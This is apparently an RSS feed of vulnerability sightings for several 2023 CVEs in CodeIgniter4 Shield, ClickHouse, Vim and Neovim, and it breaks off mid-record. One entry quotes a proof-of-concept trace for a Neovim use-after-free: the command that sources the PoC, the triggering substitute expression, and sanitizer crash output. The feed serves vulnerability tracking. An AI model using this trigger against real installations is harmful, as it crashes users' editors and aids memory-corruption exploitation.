Most recent sightings.

Most recent sightings. https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Fri, 19 Jun 2026 10:40:43 +0000 747dca83-8f66-4094-accd-7be7f25dbe02 https://vulnerability.circl.lu/sighting/747dca83-8f66-4094-accd-7be7f25dbe02/export {"uuid": "747dca83-8f66-4094-accd-7be7f25dbe02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48708", "type": "seen", "source": "https://t.me/ctinow/155417", "content": "https://ift.tt/wlED3AG\nCVE-2023-48708 | CodeIgniter4 Shield up to 1.0.0-beta.7 Login log file", "creation_timestamp": "2023-12-16T14:48:05.000000Z"} {"uuid": "747dca83-8f66-4094-accd-7be7f25dbe02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48708", "type": "seen", "source": "https://t.me/ctinow/155417", "content": "https://ift.tt/wlED3AG\nCVE-2023-48708 | CodeIgniter4 Shield up to 1.0.0-beta.7 Login log file", "creation_timestamp": "2023-12-16T14:48:05.000000Z"} https://vulnerability.circl.lu/sighting/747dca83-8f66-4094-accd-7be7f25dbe02/export Sat, 16 Dec 2023 14:48:05 +0000 58e01ef7-ec9a-414e-99a9-7008cdc79065 https://vulnerability.circl.lu/sighting/58e01ef7-ec9a-414e-99a9-7008cdc79065/export {"uuid": "58e01ef7-ec9a-414e-99a9-7008cdc79065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48707", "type": "seen", "source": "https://t.me/ctinow/155423", "content": "https://ift.tt/A9sPxoU\nCVE-2023-48707 | CodeIgniter4 Shield up to 1.0.0-beta.7 HMAC SHA256 cleartext storage", "creation_timestamp": "2023-12-16T15:17:55.000000Z"} {"uuid": "58e01ef7-ec9a-414e-99a9-7008cdc79065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48707", "type": "seen", "source": "https://t.me/ctinow/155423", "content": "https://ift.tt/A9sPxoU\nCVE-2023-48707 | CodeIgniter4 Shield up to 1.0.0-beta.7 HMAC SHA256 cleartext storage", "creation_timestamp": "2023-12-16T15:17:55.000000Z"} https://vulnerability.circl.lu/sighting/58e01ef7-ec9a-414e-99a9-7008cdc79065/export Sat, 16 Dec 2023 15:17:55 +0000 20af7bef-a250-4100-b98d-e90e1abecd7f https://vulnerability.circl.lu/sighting/20af7bef-a250-4100-b98d-e90e1abecd7f/export {"uuid": "20af7bef-a250-4100-b98d-e90e1abecd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48702", "type": "seen", "source": "https://t.me/ctinow/156178", "content": "https://ift.tt/oN3gQpB\nCVE-2023-48702 Exploit", "creation_timestamp": "2023-12-18T23:17:44.000000Z"} {"uuid": "20af7bef-a250-4100-b98d-e90e1abecd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48702", "type": "seen", "source": "https://t.me/ctinow/156178", "content": "https://ift.tt/oN3gQpB\nCVE-2023-48702 Exploit", "creation_timestamp": "2023-12-18T23:17:44.000000Z"} https://vulnerability.circl.lu/sighting/20af7bef-a250-4100-b98d-e90e1abecd7f/export Mon, 18 Dec 2023 23:17:44 +0000 2c36e57e-f9c8-49c9-9ccf-ea33e6de4cc2 https://vulnerability.circl.lu/sighting/2c36e57e-f9c8-49c9-9ccf-ea33e6de4cc2/export {"uuid": "2c36e57e-f9c8-49c9-9ccf-ea33e6de4cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48704", "type": "seen", "source": "https://t.me/ctinow/158490", "content": "https://ift.tt/petAPgX\nCVE-2023-48704", "creation_timestamp": "2023-12-22T17:23:44.000000Z"} {"uuid": "2c36e57e-f9c8-49c9-9ccf-ea33e6de4cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48704", "type": "seen", "source": "https://t.me/ctinow/158490", "content": "https://ift.tt/petAPgX\nCVE-2023-48704", "creation_timestamp": "2023-12-22T17:23:44.000000Z"} https://vulnerability.circl.lu/sighting/2c36e57e-f9c8-49c9-9ccf-ea33e6de4cc2/export Fri, 22 Dec 2023 17:23:44 +0000 1ccade4a-eba8-4318-a0f5-fa50a33c4f4e https://vulnerability.circl.lu/sighting/1ccade4a-eba8-4318-a0f5-fa50a33c4f4e/export {"uuid": "1ccade4a-eba8-4318-a0f5-fa50a33c4f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://t.me/ctinow/163627", "content": "https://ift.tt/7DHxGIn\nCVE-2023-48706 Vim Vulnerability in NetApp Products", "creation_timestamp": "2024-01-05T18:31:38.000000Z"} {"uuid": "1ccade4a-eba8-4318-a0f5-fa50a33c4f4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://t.me/ctinow/163627", "content": "https://ift.tt/7DHxGIn\nCVE-2023-48706 Vim Vulnerability in NetApp Products", "creation_timestamp": "2024-01-05T18:31:38.000000Z"} https://vulnerability.circl.lu/sighting/1ccade4a-eba8-4318-a0f5-fa50a33c4f4e/export Fri, 05 Jan 2024 18:31:38 +0000 595ab860-f8b7-44b3-aa8e-33b0137edccb https://vulnerability.circl.lu/sighting/595ab860-f8b7-44b3-aa8e-33b0137edccb/export {"uuid": "595ab860-f8b7-44b3-aa8e-33b0137edccb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48704", "type": "seen", "source": "https://t.me/ctinow/169643", "content": "https://ift.tt/6xF7uHJ\nCVE-2023-48704 | ClickHouse buffer overflow (GHSA-5rmf-5g48-xv63)", "creation_timestamp": "2024-01-18T10:11:31.000000Z"} {"uuid": "595ab860-f8b7-44b3-aa8e-33b0137edccb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48704", "type": "seen", "source": "https://t.me/ctinow/169643", "content": "https://ift.tt/6xF7uHJ\nCVE-2023-48704 | ClickHouse buffer overflow (GHSA-5rmf-5g48-xv63)", "creation_timestamp": "2024-01-18T10:11:31.000000Z"} https://vulnerability.circl.lu/sighting/595ab860-f8b7-44b3-aa8e-33b0137edccb/export Thu, 18 Jan 2024 10:11:31 +0000 73d90186-9450-4d62-a3c1-4130cd0665f0 https://vulnerability.circl.lu/sighting/73d90186-9450-4d62-a3c1-4130cd0665f0/export {"uuid": "73d90186-9450-4d62-a3c1-4130cd0665f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48703", "type": "seen", "source": "https://t.me/ctinow/201821", "content": "https://ift.tt/jR8eFHa\nCVE-2023-48703", "creation_timestamp": "2024-03-06T21:26:05.000000Z"} {"uuid": "73d90186-9450-4d62-a3c1-4130cd0665f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48703", "type": "seen", "source": "https://t.me/ctinow/201821", "content": "https://ift.tt/jR8eFHa\nCVE-2023-48703", "creation_timestamp": "2024-03-06T21:26:05.000000Z"} https://vulnerability.circl.lu/sighting/73d90186-9450-4d62-a3c1-4130cd0665f0/export Wed, 06 Mar 2024 21:26:05 +0000 875d2ed5-5a6f-4aae-b88a-4df240f70286 https://vulnerability.circl.lu/sighting/875d2ed5-5a6f-4aae-b88a-4df240f70286/export {"uuid": "875d2ed5-5a6f-4aae-b88a-4df240f70286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48703", "type": "seen", "source": "https://t.me/ctinow/201832", "content": "https://ift.tt/jR8eFHa\nCVE-2023-48703", "creation_timestamp": "2024-03-06T21:26:19.000000Z"} {"uuid": "875d2ed5-5a6f-4aae-b88a-4df240f70286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48703", "type": "seen", "source": "https://t.me/ctinow/201832", "content": "https://ift.tt/jR8eFHa\nCVE-2023-48703", "creation_timestamp": "2024-03-06T21:26:19.000000Z"} https://vulnerability.circl.lu/sighting/875d2ed5-5a6f-4aae-b88a-4df240f70286/export Wed, 06 Mar 2024 21:26:19 +0000 68f7c78b-5751-43b4-a03c-6663a20e4fe9 https://vulnerability.circl.lu/sighting/68f7c78b-5751-43b4-a03c-6663a20e4fe9/export {"uuid": "68f7c78b-5751-43b4-a03c-6663a20e4fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/6067ed1ca2a2492793f7e001d36dd0f9", "content": "Command:\n./nvim-0.9.5 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: aunmenu *\n\nExecuting: vnoremenu PopUp.Cut \"+x\n\nExecuting: vnoremenu PopUp.Copy \"+y\n\nExecuting: anoremenu PopUp.Paste \"+gP\n\nExecuting: vnoremenu PopUp.Paste \"+P\n\nExecuting: vnoremenu PopUp.Delete \"_x\n\nExecuting: nnoremenu PopUp.Select\\ All ggVG\n\nExecuting: vnoremenu PopUp.Select\\ All gg0oG$\n\nExecuting: inoremenu PopUp.Select\\ All VG\n\nExecuting: anoremenu PopUp.-1- \n\nExecuting: anoremenu PopUp.How-to\\ disable\\ mouse help disable-mouse\n\nExecuting: \n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling Test_aaaa_substitute_expr_recursive_special()\n\nline 1: func R()\n\nline 5: new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6: put ='abcdef'\n\nline 7: let bufnr = bufnr('%')\n\nline 8: try\n\nline 9: silent! :s/./~\\=R()/0\n\nline 10: \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11: let @/='.'\n\nline 12: ~g\n\ncalling R()\n\nline 1: \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2: %s/./\\='.'/gn\n\n6 matches on 1 line\nR returning #0\n\ncontinuing in Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25534==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000071f5 at pc 0x00000072d4cb bp 0x7ffc4943b720 sp 0x7ffc4943b718\nREAD of size 1 at 0x6020000071f5 thread T0\n #0 0x72d4ca in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24\n #1 0x948f4e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:510:10\n #2 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n #3 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n #4 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n #5 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n #6 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n #7 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n #8 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n #9 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n #10 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n #11 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n #12 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n #13 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n #14 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n #15 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #19 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #20 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #21 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #22 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #23 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n #24 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #25 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #26 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #27 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #28 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #29 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #30 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #31 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #32 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #33 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #34 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #35 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #36 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n #37 0x467f7d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x467f7d)\n\n0x6020000071f5 is located 5 bytes inside of 7-byte region [0x6020000071f0,0x6020000071f7)\nfreed by thread T0 here:\n #0 0x4e043d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e043d)\n #1 0xca29a9 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:134:3\n #2 0x9b0bcb in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3081:3\n #3 0x9b471a in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3387:7\n #4 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #5 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #6 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #7 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #8 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #9 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #10 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #11 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #12 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n #13 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n #14 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n #15 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n #16 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n #17 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n #18 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n #19 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n #20 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n #21 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n #22 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n #23 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n #24 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n #25 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #26 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #27 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #28 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #29 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n\npreviously allocated by thread T0 here:\n #0 0x4e06bd in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e06bd)\n #1 0xca2787 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:88:15\n #2 0xca2954 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:15\n #3 0xca2ba1 in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:194:15\n #4 0xca2c18 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:212:17\n #5 0xca336b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:431:10\n #6 0x9b4624 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3388:16\n #7 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n #8 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #9 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #10 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #11 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n #12 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n #13 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n #14 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n #15 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #19 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n #20 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n #21 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n #22 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n #23 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n #24 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n #25 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n #26 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n #27 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n #28 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24 in skipwhite\nShadow bytes around the buggy address:\n 0x0c047fff8de0: fa fa 05 fa fa fa 01 fa fa fa 01 fa fa fa fd fd\n 0x0c047fff8df0: fa fa 05 fa fa fa 01 fa fa fa fd fa fa fa fd fd\n 0x0c047fff8e00: fa fa 00 01 fa fa fd fd fa fa fd fa fa fa fd fa\n 0x0c047fff8e10: fa fa fd fa fa fa 01 fa fa fa 00 fa fa fa 01 fa\n 0x0c047fff8e20: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047fff8e30: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n 0x0c047fff8e40: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n 0x0c047fff8e50: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n 0x0c047fff8e60: fa fa fd fa fa fa 02 fa fa fa 06 fa fa fa 07 fa\n 0x0c047fff8e70: fa fa 02 fa fa fa fd fa fa fa fd fd fa fa 00 02\n 0x0c047fff8e80: fa fa 06 fa fa fa 02 fa fa fa 02 fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==25534==ABORTING\n\n\nCommand:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\$.\\{-}\$//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! CmdwinEnter [:>] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling function Test_aaaa_substitute_expr_recursive_special()\n\nline 1: func R()\n\nline 5: new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6: put ='abcdef'\n\nline 7: let bufnr = bufnr('%')\n\nline 8: try\n\nline 9: silent! :s/./~\\=R()/0\n\nline 10: \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11: let @/='.'\n\nline 12: ~g\n\ncalling function Test_aaaa_substitute_expr_recursive_special[12]..R()\n\nline 1: \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2: %s/./\\='.'/gn\n\n6 matches on 1 line\nfunction Test_aaaa_substitute_expr_recursive_special[12]..R returning #0\n\ncontinuing in function Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25706==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200003b1f5 at pc 0x000000470b79 bp 0x7ffcce6c53f0 sp 0x7ffcce6c4bb0\nREAD of size 1 at 0x60200003b1f5 thread T0\n #0 0x470b78 in strlen (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78)\n #1 0x6c03ef in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1163:27\n #2 0x86ce1e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:474:10\n #3 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n #4 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n #5 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n #6 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n #7 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n #8 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n #9 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n #10 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n #11 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n #12 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n #13 